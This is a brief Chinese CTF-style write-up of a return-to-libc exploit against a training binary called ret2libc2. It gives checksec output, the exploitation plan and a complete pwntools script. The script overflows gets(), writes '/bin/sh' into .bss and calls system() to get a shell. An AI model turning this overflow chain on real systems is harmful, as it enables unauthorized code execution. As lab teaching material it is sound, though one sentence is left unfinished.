和Ret2Libc(1)一样,先把程序扔进IDA看看代码
和Ret2Libc(1)一样,gets存在溢出漏洞
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
可以看到程序开启了NX,
我的linux已经开启了ASLR
存在system函数,地址为 0x08048490
不存在‘/bin/sh'字段
漏洞利用思路:
程序中既然找不到‘/bin/sh‘,那我们就需要想办法输入进去,恰好用objdump发现存在gets函数 ,地址为0x08048460
而且还存在
也就说明,我们可以手动把shellcode输入进去,然后存放进bss段里面,最后把这个bss地址传给system来调用shellcode
1、用gets的地址覆盖函数返回地址
2、构造gets的返回地址,(因为gets输入shellcode后,我们就要调用system函数来getshell,所以gets的返回地址是system函数的调用地址,即system_plt)
3、构造gets需要的参数(就是存放输入字符串的地址,bss段0x804A080)
4、构造system的参数(就是存放输入字符串的地址,bss段0x804A080)
exp:
from pwn import *
bss_addr = 0x0804A080
gets_plt = 0x08048460
sys_plt = 0x08048490
io=process('./ret2libc2')
io.recvuntil('What do you think ?')
payload = 'A'*112 + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr)
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()